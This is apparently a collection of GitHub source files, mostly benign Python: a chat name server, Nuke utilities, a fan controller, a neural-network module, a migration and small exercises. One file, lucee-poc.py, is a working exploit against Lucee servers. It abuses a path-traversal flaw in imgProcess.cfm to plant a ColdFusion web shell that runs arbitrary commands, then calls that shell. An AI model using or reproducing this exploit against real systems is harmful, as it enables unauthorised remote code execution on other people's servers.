it\n self.truncate(ckpt_ts)\n return catalog\n else:\n for line in self.log.read().splitlines():\n try:\n name, host, port, status = line.split()\n catalog.add(name, (host, port), status, verbose=False)\n self.length += 1\n except ValueError:\n # invalid record, skip it\n continue\n return catalog\n\n def append(self, name, address, status) -> int:\n # append a new record to log file\n address = ' '.join(map(str, address))\n self.log.write(' '.join([name, address, status])+'\\n')\n self.log.flush()\n os.sync()\n self.length += 1\n return self.length\n\n def truncate(self, ts):\n # truncate log file\n self.log.truncate(0)\n self.log.seek(0)\n # write current timestamp\n self.log.write(str(ts)+'\\n')\n self.log.flush()\n os.sync()\n self.length = 0\n\n\nclass NameServer:\n '''Name server for user discovery.'''\n def __init__(self, host=None, port=0):\n # Initialize catalog from checkpoint file and playback log\n self.catalog = Catalog()\n # Read checkpoint file\n self.ckpt = Checkpoint(CKPT)\n self.catalog, self.ckpt_ts = self.ckpt.load()\n # Read log file\n self.log = Log(LOG)\n self.catalog = self.log.playback(self.catalog, self.ckpt_ts)\n\n # initialize socket\n host = host if host else socket.gethostname()\n self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.s.bind((host, port))\n self.s.listen(5)\n self.host, self.port = self.s.getsockname()\n print(\"Name server listening on {}:{}\".format(self.host, self.port))\n\n # send UDP broadcast to known online users in the catalog\n broadcast = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n package = UDPPackage('NAMESERVER', self.host, self.port, 'address update')\n for name, user in self.catalog.items():\n if user['status'] == 'online':\n ip_addr, port = user['address']\n port = int(port)\n broadcast.sendto(str(package).encode(), (ip_addr, port))\n broadcast.close()\n\n def __del__(self):\n try:\n self.s.close()\n except AttributeError:\n pass\n\n def run(self):\n self.last_update_stale = time.time()\n while True:\n # Update stale users every 120 seconds\n if time.time() - self.last_update_stale > 120.0:\n updated = self.catalog.update_stale()\n self.last_update_stale = time.time()\n # Update log\n for user_info in updated:\n self.log.append(*user_info)\n # Check for new connections\n readable, _, _ = select([self.s], [], [], 0.0)\n if not readable:\n continue\n client, address = self.s.accept()\n client.settimeout(10.0)\n print(\"Connection from {}:{}\".format(address[0], address[1]))\n try:\n sz = client.recv(8)\n if not sz:\n # connection closed by client\n raise ConnectionAbortedError(\"Connection closed by client\")\n length = int.from_bytes(sz, \"big\")\n msg = b''\n while len(msg) < length:\n to_read = length - len(msg)\n msg += client.recv(MSG_SIZE if to_read > MSG_SIZE else to_read)\n except:\n client.close()\n continue\n # Operate on the message\n try:\n msg = json.loads(msg.decode())\n if msg['op'] == 'register':\n # register a new user or update an existing user's information\n self.catalog.add(msg['username'], msg['address'], msg['status'])\n # Update log\n log_length = self.log.append(msg['username'], msg['address'], msg['status'])\n if log_length > MAX_LOGS:\n # Update checkpoint\n save_ts = time.time()\n self.ckpt.save(self.catalog, save_ts)\n self.log.truncate(save_ts)\n res = {'status': 'ok'}\n elif msg['op'] == 'lookup':\n # lookup a user's information\n user = self.catalog.lookup(msg['username'])\n res = user if user else {'status': 'error'}\n elif msg['op'] == 'add_friend':\n from_uname, to_uname = msg['username'], msg['friend']\n try:\n from_host, from_port = self.catalog.lookup(from_uname)['address']\n to_host, to_port = self.catalog.lookup(to_uname)['address']\n except TypeError:\n raise ValueError(\"User {} not found\".format(from_uname))\n # send UDP request to to_uname about from_uname's request to add as a friend\n content = {'username': from_uname, 'host': from_host, 'port': from_port}\n res = self.send_udp('add friend', to_host, to_port, content)\n else:\n raise ValueError(\"Unrecognized request\")\n except (ValueError, KeyError):\n res = {'status': 'error'}\n # Send response\n res = json.dumps(res).encode()\n sz = len(res).to_bytes(8, \"big\")\n client.send(sz + res)\n client.close()\n \n def send_udp(self, topic, to_host, to_port, content=None):\n udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n udp_sock.settimeout(20.0)\n from_host, from_port = '', ''\n if topic == 'add friend':\n from_host, from_port = udp_sock.getsockname()\n elif topic == 'address update':\n from_host, from_port = self.host, self.port\n message = {\n 'senderName': 'NAMESERVER',\n 'senderHost': from_host,\n 'senderPort': from_port,\n 'topic': topic,\n }\n if content:\n message['content'] = content\n message = json.dumps(message).encode()\n udp_sock.sendto(message, (to_host, to_port))\n # wait for response\n if topic == 'address update':\n udp_sock.close()\n return\n try:\n response, _ = udp_sock.recvfrom(MSG_SIZE)\n retry_counter = 1\n while not response:\n time.sleep(2**retry_counter)\n print(\"No response from user, retry in {} seconds\".format(2**retry_counter))\n response, _ = udp_sock.recvfrom(MSG_SIZE)\n retry_counter += 1\n if retry_counter > 5:\n print(\"No response. Please try again later.\")\n raise socket.timeout(\"No response from user\")\n response = json.loads(response.decode())\n if response['status'] == 'success':\n res = {'status': 'success'}\n else:\n res = {'status': 'error'}\n except:\n res = {'status': 'error'}\n udp_sock.close()\n return res\n\n\n\nif __name__ == '__main__':\n ns = NameServer()\n ns.run()","repo_name":"DannyTDS/P2P-Chat","sub_path":"NameServer.py","file_name":"NameServer.py","file_ext":"py","file_size_in_byte":11362,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"7942145521","text":"import sys\nimport os\nimport threading\nimport time\nimport re\nimport importlib\n\n\nimport nuke\n\n__menus__ = {}\n\n\ndef getScene():\n root_name = nuke.toNode(\"root\").name()\n return root_name\n\n\ndef getRenderOpts():\n # returns a Nuke \"format\" object\n oRenderOpts = nuke.toNode(\"root\").knob(\"format\").value()\n return oRenderOpts\n\n\ndef getSelected():\n sel = nuke.selectedNode().knob(\"name\").value()\n return sel\n\n\ndef getResX():\n oFormat = getRenderOpts()\n ResX = nuke.Format.width(oFormat)\n # note there is also nuke.Format.setWidth(oFormat)\n return ResX\n\n\ndef getResY():\n oFormat = getRenderOpts()\n ResY = nuke.Format.height(oFormat)\n # note there is also nuke.Format.setHeight(oFormat)\n return ResY\n\n\ndef getExtension():\n ext = getSceneFullPath()[getSceneFullPath().find(\".\") :]\n return \".nk\"\n\n\ndef getPixelRatio():\n oFormat = getRenderOpts()\n pixRatio = nuke.Format.pixelAspect(oFormat)\n return pixRatio\n\n\ndef getDeviceAspectRatio():\n # resX/resY?\n return 1\n\n\ndef getStartFrame():\n StartFrame = nuke.toNode(\"root\").knob(\"first_frame\").value()\n return StartFrame\n\n\ndef getEndFrame():\n EndFrame = nuke.toNode(\"root\").knob(\"last_frame\").value()\n return EndFrame\n\n\ndef getStepBy():\n StepBy = 1\n return StepBy\n\n\ndef getScenePath():\n return os.path.split(getSceneFullPath())[0]\n\n\ndef getSceneFullPath():\n return nuke.toNode(\"root\").knob(\"name\").value()\n\n\ndef getSceneName():\n return os.path.split(getSceneFullPath())[1]\n\n\ndef getSceneCleanName():\n return getSceneName().split(\".\")[0]\n\n\ndef getTimeSliderRange():\n return (getStartFrame(), getEndFrame())\n\n\ndef hasChanged():\n return nuke.Root().modified()\n\n\ndef saveAs(*args):\n args = cleanArgs(args)\n outputFileName = args[0]\n nuke.scriptSaveAs(outputFileName)\n\n\ndef setRenderPaths(*args):\n args = cleanArgs(args)\n outPath = args[0]\n selWrites = nuke.selectedNodes(\"Write\")\n\n selWrites.reverse()\n for eachNode in selWrites:\n eachNode.setSelected(False)\n\n for eachNode in selWrites:\n ext = \"exr\"\n if eachNode.knob(\"file\").value():\n match = re.search(\".*\\.(\\w+)\", eachNode.knob(\"file\").value())\n if match:\n ext = match.groups(1)[0]\n print(ext)\n\n eachNode.knob(\"file\").setValue(outPath + r\".%04d.\" + ext)\n eachNode.knob(\"label\").setValue(os.path.basename(os.path.dirname(outPath)))\n\n for eachNode in selWrites:\n eachNode.setSelected(True)\n\n return\n\n\ndef createReadNode(*args):\n args = cleanArgs(args)\n infoDict = args[0]\n readNode = nuke.nodes.Read()\n readNode.knob(\"file\").setValue(infoDict[\"file\"])\n readNode.knob(\"on_error\").setValue(1) # black on missing frames\n readNode.knob(\"first\").setValue(int(infoDict[\"first\"]))\n readNode.knob(\"last\").setValue(int(infoDict[\"last\"]))\n\n return readNode\n\n\ndef getWritePath(*args):\n args = cleanArgs(args)\n eachPass = args[0]\n numsearch = re.search(\".*[\\.|_](\\d+)\\.\", eachPass[\"importFrame\"])\n frameNum = \"0101\"\n if numsearch:\n frameNum = numsearch.group(1)\n return (\n eachPass[\"importFrame\"]\n .replace(frameNum, \"%04d\")\n .replace(\n (\"/\" + eachPass[\"version\"] + \"/\"),\n (\"/\" + eachPass[\"version\"] + eachPass[\"imageTag\"] + \"/\"),\n )\n )\n\n\ndef getNukeFrameNumbers(digits):\n \"\"\"\n return the size of nuke 'frame number variable'\n\n input:\n %04\n ###\n \"\"\"\n if \"#\" in digits:\n return digits.count(\"#\")\n else:\n return int(\"\".join(i for i in digits if i.isdigit()))\n\n\ndef refreshNode(*args):\n args = cleanArgs(args)\n strNode = args[0]\n n = nuke.toNode(strNode)\n x = int(n.knob(\"tile_color\").getValue())\n n.knob(\"tile_color\").setValue(0)\n n.knob(\"tile_color\").setValue(x)\n n.knob(\"file\").setFlag(nuke.INVISIBLE)\n n.knob(\"file\").clearFlag(nuke.INVISIBLE)\n\n\ndef nodePaste(*args):\n args = cleanArgs(args)\n file = args[0]\n nuke.nodePaste(file)\n\n\ndef cleanArgs(args):\n if type(args[0]) == list and len(args) == 1:\n return args[0]\n else:\n return args\n\n\ndef paddingSplit(file_name):\n \"\"\"\n This will break up a sting that describes\n a frame range into component pieces.\n\n input: \n output: ; (int,string,string)\n\n Example:\n print paddingSplit(\"colorbars.%04d.sgi\")\n (4,\"colorbars.\",\".sgi\")\n \"\"\"\n file_name = file_name.strip()\n\n padding = 0\n prefix = file_name\n suffix = None\n\n m1 = re.search(\"^(.+)%(\\d+)d(.+)$\", file_name)\n m2 = re.search(\"^(.+)(#+)(,+)$\", file_name)\n if m1:\n prefix = m1.group(1)\n padding = int(m1.group(2))\n suffix = m1.group(3)\n elif m2:\n prefix = m2.group(1)\n padding = m2.group(2).count(\"#\")\n suffix = m2.group(3)\n return (padding, prefix, suffix)\n\n\ndef reload_lib(mylib):\n importlib.reload(mylib)\n","repo_name":"rjmoggach/nuke-dotnuke","sub_path":"tools/python/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4911,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"45"} +{"seq_id":"72355118217","text":"from mercantil import Mercantil\nfrom pessoa import Pessoa\n\n\ndef main():\n global userInput\n \n while True:\n line = input()\n print(f\"${line}\")\n userInput = line.split(\" \")\n\n try:\n menu()\n except Exception as e:\n print(e)\n\n\ndef menu():\n global mercantil\n \n if command(\"end\"):\n exit(0)\n\n if command(\"init\"):\n mercantil = Mercantil(int(userInput[1]))\n\n if command(\"show\"):\n print(mercantil)\n\n if command(\"chegar\"):\n mercantil.chegar(Pessoa(userInput[1]))\n\n if command(\"chamar\"):\n mercantil.chamar(int(userInput[1]))\n\n if command(\"finalizar\"):\n mercantil.finalizar(int(userInput[1])) \n\n\ndef command(command):\n if (command.__eq__(userInput[0])):\n return True\n \n return False\n\n\nif __name__ == \"__main__\":\n main() ","repo_name":"Macai13/POO-2023.2","sub_path":"Extra/Budega (.py)/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"26890034767","text":"import logging\nimport signal\nimport sys\nimport time\nimport RPi.GPIO as GPIO\n\nFAN_CURVE = [[40,0], [50,20], [60,50], [70,80]]\n\nclass RollingAverage:\n def __init__(self, size):\n self.max = size\n self.data = []\n\n def append(self, x):\n self.data.append(x)\n\n if len(self.data) > self.max:\n self.data.pop(0)\n\n def average(self):\n if len(self.data) == 0:\n return 0\n\n sum = 0\n for i in self.data:\n sum += i\n\n return sum / len(self.data)\n\nclass FanController:\n def __init__(self, pin, frequency, minSpeed=30, pollingInterval=1):\n self.pollingInterval = pollingInterval\n self.minSpeed = minSpeed\n self.temp = RollingAverage(30)\n self.lastSpeed = 0\n\n self.logger = self._init_logger()\n self.logger.info('Fan Controller instance created')\n self.fan = self._init_gpio(pin, frequency)\n signal.signal(signal.SIGTERM, self._handle_sigterm)\n\n def _init_logger(self):\n logger = logging.getLogger(__name__)\n logger.setLevel(logging.INFO)\n stdout_handler = logging.StreamHandler()\n stdout_handler.setLevel(logging.INFO)\n stdout_handler.setFormatter(logging.Formatter('%(levelname)8s | %(message)s'))\n logger.addHandler(stdout_handler)\n return logger\n \n def _init_gpio(self, pin, freq):\n GPIO.setmode(GPIO.BOARD) #set pin numbering system\n GPIO.setup(pin,GPIO.OUT, initial=GPIO.LOW)\n fan = GPIO.PWM(pin, freq)\n return fan\n \n def start(self):\n self.fan.start(30)\n self.logger.info('Fan Controller started')\n try:\n while True:\n self.process()\n time.sleep(self.pollingInterval)\n except KeyboardInterrupt:\n self.logger.warning('Keybord interrupt (SIGINT) received...')\n self.stop()\n\n def process(self):\n itemp = self.getTemperature()\n temp = self.getAverageTemperature()\n speed = self.getSpeed(temp)\n if speed != self.lastSpeed:\n self.fan.ChangeDutyCycle(speed)\n self.lastSpeed = speed\n\n self.logger.debug(f'Temp: {itemp}, Avg Temp: {temp} Speed: {speed}')\n\n def getSpeed(self, temperature):\n speed = 0\n for point in reversed(FAN_CURVE):\n if temperature >= point[0]:\n speed = point[1]\n break\n \n if speed > 0 and speed < self.minSpeed:\n speed = self.minSpeed\n\n return speed\n\n def stop(self):\n self.logger.info('Stopping fan-controller...')\n GPIO.cleanup()\n sys.exit(0)\n\n def _handle_sigterm(self, sig, frame):\n self.logger.warning('SIGTERM received...')\n self.stop()\n\n def getTemperature(self):\n cpuTempFile = open(\"/sys/class/thermal/thermal_zone0/temp\", \"r\")\n cpuTemp = float(cpuTempFile.read()) / 1000\n cpuTempFile.close()\n\n return cpuTemp\n\n def getAverageTemperature(self):\n currentTemp = self.getTemperature()\n self.temp.append(currentTemp)\n return self.temp.average()\n\nif __name__ == '__main__':\n service = FanController(12, 25)\n service.start()\n","repo_name":"JMS737/fan-controller","sub_path":"fan-controller.py","file_name":"fan-controller.py","file_ext":"py","file_size_in_byte":3221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"19115843229","text":"\"\"\"empty message\n\nRevision ID: 3b3890df8ee4\nRevises: d782c7f2d484\nCreate Date: 2023-05-26 05:02:18.282865\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '3b3890df8ee4'\ndown_revision = 'd782c7f2d484'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('name_of_environment_variable_of_marathon_groups',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=128), nullable=True),\n sa.Column('group_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['group_id'], ['marathon_groups.id'], name=op.f('fk_name_of_environment_variable_of_marathon_groups_group_id_marathon_groups')),\n sa.PrimaryKeyConstraint('id', name=op.f('pk_name_of_environment_variable_of_marathon_groups'))\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('name_of_environment_variable_of_marathon_groups')\n # ### end Alembic commands ###\n","repo_name":"Vladislav-Isakov/control-panel-for-vk-marathons","sub_path":"migrations/versions/3b3890df8ee4_.py","file_name":"3b3890df8ee4_.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"16025902034","text":"import sys, os\nsys.path.append(os.path.dirname(os.path.abspath(__file__))+'/../')\n\n# Others\nfrom ..DSConv2d import DSConv2d\nfrom ..DSConvEngine import DSConvEngine\n\n# PyTorch\nimport torch\nimport torch.nn as nn\nimport torchvision\n\ndef conv3x3(in_planes, out_planes, block_size = 32, stride=1):\n \"\"\"3x3 convolution with padding\"\"\"\n return DSConv2d(in_planes, out_planes, kernel_size=3, block_size=block_size, stride=stride, padding=1, bias=False)\n\nclass BasicBlock(nn.Module):\n expansion = 1\n\n def __init__(self, inplanes, planes, block_size=32, stride=1, downsample=None):\n super(BasicBlock, self).__init__()\n self.conv1 = conv3x3(inplanes, planes, stride=stride, block_size=block_size)\n self.bn1 = nn.BatchNorm2d(planes)\n self.relu = nn.ReLU(inplace=True)\n self.conv2 = conv3x3(planes, planes, block_size=block_size)\n self.bn2 = nn.BatchNorm2d(planes)\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n residual = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n\n out += residual\n out = self.relu(out)\n return out\n\nclass Bottleneck(nn.Module):\n expansion = 4\n\n def __init__(self, inplanes, planes, block_size=32, stride=1, downsample=None):\n super(Bottleneck, self).__init__()\n self.conv1 = DSConv2d(inplanes, planes, kernel_size=1, block_size=block_size, bias=False)\n self.bn1 = nn.BatchNorm2d(planes)\n self.conv2=DSConv2d(planes,planes,kernel_size=3,block_size=block_size,stride=stride,padding=1,bias=False)\n self.bn2 = nn.BatchNorm2d(planes)\n self.conv3 = DSConv2d(planes, planes*self.expansion, kernel_size=1, block_size=block_size, bias=False)\n self.bn3 = nn.BatchNorm2d(planes*self.expansion)\n self.relu = nn.ReLU(inplace=True)\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n residual = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n out = self.relu(out)\n\n out = self.conv3(out)\n out = self.bn3(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n\n out+=residual\n out = self.relu(out)\n\n return out\n\nclass BlockResNet(nn.Module):\n def __init__(self, block, layers, block_size=32, num_classes = 1000):\n self.inplanes = 64\n super(BlockResNet, self).__init__()\n self.conv1 = DSConv2d(3, 64, kernel_size=7, block_size=block_size, stride=2, padding=3, bias=False)\n self.bn1 = nn.BatchNorm2d(64)\n self.relu = nn.ReLU(inplace=True)\n self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n self.layer1 = self._make_layer(block, 64, layers[0],block_size=block_size)\n self.layer2 = self._make_layer(block, 128, layers[1],block_size=block_size,stride=2)\n self.layer3 = self._make_layer(block, 256, layers[2],block_size=block_size,stride=2)\n self.layer4 = self._make_layer(block, 512, layers[3],block_size=block_size,stride=2)\n self.avgpool = nn.AvgPool2d(7, stride=1)\n self.fc = nn.Linear(512*block.expansion, num_classes)\n\n for m in self.modules():\n if isinstance(m, DSConv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n nn.init.constant_(m.alpha, 1)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n def _make_layer(self, block, planes, blocks, block_size=32, stride=1):\n downsample = None\n if stride!=1 or self.inplanes !=planes*block.expansion:\n downsample = nn.Sequential(\n DSConv2d(self.inplanes, planes*block.expansion, kernel_size=1, block_size=block_size,stride=stride, bias=False),\n nn.BatchNorm2d(planes*block.expansion),\n )\n layers = []\n layers.append(block(self.inplanes, planes, block_size, stride, downsample))\n self.inplanes = planes*block.expansion\n for i in range(1, blocks):\n layers.append(block(self.inplanes, planes, block_size))\n return nn.Sequential(*layers)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.bn1(x)\n x = self.relu(x)\n x = self.maxpool(x)\n\n x = self.layer1(x)\n x = self.layer2(x)\n x = self.layer3(x)\n x = self.layer4(x)\n\n x = self.avgpool(x)\n x = x.view(x.size(0), -1)\n x = self.fc(x)\n\n return x\n\ndef block_resnet101(pretrained=False, bit_nmb=8, block_size=32, num_classes=1000):\n \"\"\"Constructs a ResNet101 model\n \"\"\"\n\n block_model = BlockResNet(Bottleneck, [3, 4, 23, 3], block_size=block_size, num_classes=num_classes)\n\n if pretrained==True:\n model = torchvision.models.resnet101(pretrained=True)\n eng = DSConvEngine(block_size, bit_nmb)\n block_model = eng(model, block_model)\n\n return block_model\n\ndef block_resnet50(pretrained=False, bit_nmb=8, block_size=32, num_classes=1000):\n \"\"\" Constructs a ResNet50 model\n \"\"\"\n block_model = BlockResNet(Bottleneck, [3, 4, 6, 3], block_size = block_size, num_classes=num_classes)\n if pretrained==True:\n model = torchvision.models.resnet50(pretrained=True)\n eng = DSConvEngine(block_size, bit_nmb)\n model = model.cuda()\n block_model = block_model.cuda()\n block_model = eng(model, block_model)\n return block_model\n\ndef block_resnet34(pretrained=False, bit_nmb=8, block_size=32, num_classes=1000):\n \"\"\" Constructs a ResNet34 model\n \"\"\"\n block_model = BlockResNet(BasicBlock, [3, 4, 6, 3], block_size=block_size, num_classes=num_classes)\n\n if pretrained==True:\n model = torchvision.models.resnet34(pretrained=True)\n eng = DSConvEngine(block_size, bit_nmb)\n block_model = eng(model, block_model)\n\n return block_model\n\n","repo_name":"ActiveVisionLab/DSConv","sub_path":"modules/resnet.py","file_name":"resnet.py","file_ext":"py","file_size_in_byte":6186,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"45"} +{"seq_id":"38548569940","text":"import string\r\nimport random\r\nimport argparse\r\nimport requests\r\nimport urllib3\r\n#Disable insecure https warnings (for self-signed SSL certificates)\r\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\r\nap = argparse.ArgumentParser()\r\nap.add_argument(\"-t\", \"--target\", default=\"http://localhost:8888\")\r\nargs = ap.parse_args()\r\nbase_url = args.target.rstrip(\"/\")\r\ndef random_string():\r\n return \"\".join(random.choices(string.ascii_lowercase, k=12))\r\npayload = f\"\"\"\\\r\n\r\n\r\n\r\n\r\n\r\n\r\n
    Command:value=\"#form.cmd#\">
    Options: value=\"#form.opts#\">
    Timeout: value=\"#form.timeout#\"\r\n value=\"5\">
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n
    \r\n#HTMLCodeFormat(myVar)#\r\n
    \r\n
    \r\n
    \r\n\"\"\"\r\nwith requests.Session() as session:\r\n img_process_url = f\"{base_url}/lucee/admin/imgProcess.cfm\"\r\n response = session.get(img_process_url)\r\n if response.ok:\r\n print(f\"[-] Target most likely not vulnerable.\")\r\n exit()\r\n filename = random_string() + \".cfm\"\r\n print(filename)\r\n print(f\"[*] Writing payload...\")\r\n session.post(f\"{img_process_url}?file=_/\" + random_string(), data={\"imgSrc\": random_string()})\r\n session.post(f\"{img_process_url}?file=_/../../../context/{filename}\", data={\"imgSrc\": payload})\r\n try:\r\n print(\"[*] Triggering shell...\")\r\n session.get(f\"{base_url}/lucee/{filename}\", timeout=2)\r\n except requests.ReadTimeout:\r\n pass\r\n\r\n\r\n\r\n\r\n","repo_name":"ab0x90/lucee-poc","sub_path":"lucee-poc.py","file_name":"lucee-poc.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"32872540823","text":"import torch\n\nimport numpy as np\n\n#------- LEADING EIGENVECTOR OBJECTIVE\ndef Loss(x, Z):\n x, Z = reshape(x, Z)\n\n A = Z.t().mm(Z)\n n = float(Z.shape[0])\n\n f = - x.t().mm(A.mm(x))\n return f.squeeze() / n\n\ndef Gradient(x, Z, proj=True):\n x, Z = reshape(x, Z)\n n = float(Z.shape[0])\n\n A = Z.t().mm(Z)\n G = - 2. * A.mm(x) / n\n \n if proj:\n return Proj(x, G)\n else:\n return G\n\ndef Lipschitz(Z):\n n = float(Z.shape[0]) \n L = np.zeros(int(n))\n\n for i in range(int(n)):\n L[i] = (Z[i]**2).sum().item()\n\n return L\n\n## LEADING EIGEN\ndef leading_eigenvecor(Z):\n Z = np.asarray(Z)\n np.random.seed(1)\n eigh = np.linalg.eigh(Z.T.dot(Z))\n\n #assert False not in (eigh[0]>0)\n return eigh[1][:, -1]\n\n\n#### - MISC\ndef reshape(x, Z):\n if isinstance(x, np.ndarray):\n x = torch.FloatTensor(x)\n\n if x.dim() == 1:\n x = x.unsqueeze(1) \n if Z.dim() == 1:\n Z = Z.unsqueeze(0)\n\n return x, Z\n\n# Riemannian sphere operations\ndef Exp(x, U):\n U_norm = torch.norm(U)\n \n A = torch.cos(U_norm) * x\n B = torch.sin(U_norm) * U / U_norm\n\n return A + B\n\ndef Retract(A, B):\n return (A + B) / float(torch.norm(A + B))\n\n\ndef Transport(U, x, y):\n return Proj(y, U)\n\ndef Proj(x, H):\n return H - x.t().mm(H) * x\n ","repo_name":"IssamLaradji/MASAGA","sub_path":"loss_eigenvector.py","file_name":"loss_eigenvector.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"18587376524","text":"class Solution:\n def fractionToDecimal(self, numerator: int, denominator: int) -> str:\n sign = '-' if numerator != 0 and (numerator < 0) ^ (denominator < 0) else ''\n n, d = abs(numerator), abs(denominator)\n \n q_left_int, r = divmod(n, d)\n \n seen = {}\n q_right_list = []\n index = 0\n while r != 0 and r not in seen:\n seen[r] = index\n q, r = divmod(r * 10, d)\n q_right_list.append(str(q))\n index += 1\n \n q_left = str(q_left_int)\n q_right = ''.join(q_right_list)\n \n if not r: return f\"{sign}{q_left}{'.' if q_right else ''}{q_right}\"\n \n i = seen[r]\n return f'{sign}{q_left}.{q_right[:i]}({q_right[i:]})'","repo_name":"Darshan-AS/leetcode_problems","sub_path":"problems/fraction_to_recurring_decimal/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"26986479192","text":"#!/usr/bin/python\n# -*- coding: utf8 -*-\n\nimport web\nfrom database import *\nfrom output import *\nfrom route import route\n\n@route('/community/section/edit')\nclass CommunitySectionEdit:\n def POST(self):\n input=web.input(name = None, section_id = None)\n session=web.ctx.session\n if not session.has_key('user_id'):\n return output(411)\n if session['user_type']!=0:\n return output(410)\n if input.section_id==None or input.name == None:\n return output(110)\n try:\n input.section_id=int(input.section_id)\n except:\n output(111)\n\n if len(input.name.strip())>20:\n return output(112)\n\n db=getDb()\n result=db.select('section',vars={'section_id':input.section_id},where='section_id=$section_id')\n if len(result)==0:\n return output(465)\n try:\n db.update('section',vars={'section_id':input.section_id},\n where='section_id=$section_id', section_name = input.name)\n return output(200)\n except:\n return output(700)","repo_name":"erha19/base_plateform","sub_path":"sites/admin/community/section/edit.py","file_name":"edit.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"15646399667","text":"import socket as soc\nimport threading\n\n\nprint(\"\\n --------------------------------------------------------------------- \\n\")\nprint(\"\\t\\t WELCOME TO UDP CHAT FOR WINDOWS \\n\")\nprint(\"\\t\\t Windows 를 위한 UDP 채팅 \\n\")\nprint(\"\\n --------------------------------------------------------------------- \\n\")\n\n# IP 및 포트 번호 지정\nwin_ip = \"127.0.0.1\"\nwin_port = 2222\nmac_ip = \"127.0.0.1\"\nmac_port = 1234\n\n# 소켓 생성 및 IP, 포트 번호 바인딩\nws = soc.socket(soc.AF_INET, soc.SOCK_DGRAM)\nws.bind((win_ip, win_port))\n\n\n# 메세지를 받아오고 상대가 q 혹은 Q 입력 시 오프라인으로 전환했다는 메세지를,\n# 그렇지 않을 시 상대가 전송해온 메세지 내용을 출력하는 메소드\ndef receive():\n while 1:\n # 메세지 받아오기\n msg_rec = ws.recvfrom(1024)\n msg_dec = msg_rec[0].decode()\n # 메세지가 q/Q인지 점검\n if msg_dec == \"q\" or msg_dec == \"Q\":\n msg_mac = \"\\n\\t MAC WENT OFFLINE\"\n return msg_mac\n break\n # 받은 메세지 출력\n msg_mac = \"\\n\\t FROM MAC : \" + msg_dec\n return msg_mac\n\n\n# 보낼 메세지를 입력받고 전송하는 메소드\ndef send():\n while 1:\n # 메세지 입력받기\n msg_send = input(\"YOUR MESSAGE (Q TO QUIT) : \")\n # 메세지 전송\n ws.sendto(msg_send.encode(), (mac_ip, mac_port))\n # 메세지가 q/Q인지 점검, 맞을 시 종료\n if msg_send == \"q\" or msg_send == \"Q\":\n exit(0)\n\n\n# 메세지를 보내기 위한 스레드 선언\nt1 = threading.Thread(target=send)\n\n# 메세지를 받아오기 위한 스레드 선언\nt2 = threading.Thread(target=receive)\n\n# 스레드 구동\nt1.start()\nt2.start()","repo_name":"syngchng/Socket-Programming-Finals","sub_path":"finals/UChat_Windows.py","file_name":"UChat_Windows.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"15998369884","text":"from lib.utils import Trade, TradeDetails\r\nimport datetime\r\nimport random\r\n\r\n\r\nclass DataGenerator:\r\n def get_random_dates(self, start_date_str=\"2023-06-01\", end_date_str=\"2023-06-15\", limit=1):\r\n \"\"\"\r\n Generate a list of random dates within a specified range.\r\n\r\n Args:\r\n start_date_str (str): The start date in the format \"YYYY-MM-DD\".\r\n end_date_str (str): The end date in the format \"YYYY-MM-DD\".\r\n limit (int): The number of random dates to generate (default: 1).\r\n\r\n Returns:\r\n list: A list of random datetime objects.\r\n\r\n \"\"\"\r\n start_date = datetime.datetime.strptime(start_date_str, \"%Y-%m-%d\")\r\n end_date = datetime.datetime.strptime(end_date_str, \"%Y-%m-%d\")\r\n\r\n dates = []\r\n delta = end_date - start_date\r\n\r\n for _ in range(limit):\r\n random_days = random.randint(0, delta.days)\r\n random_date = start_date + datetime.timedelta(days=random_days)\r\n 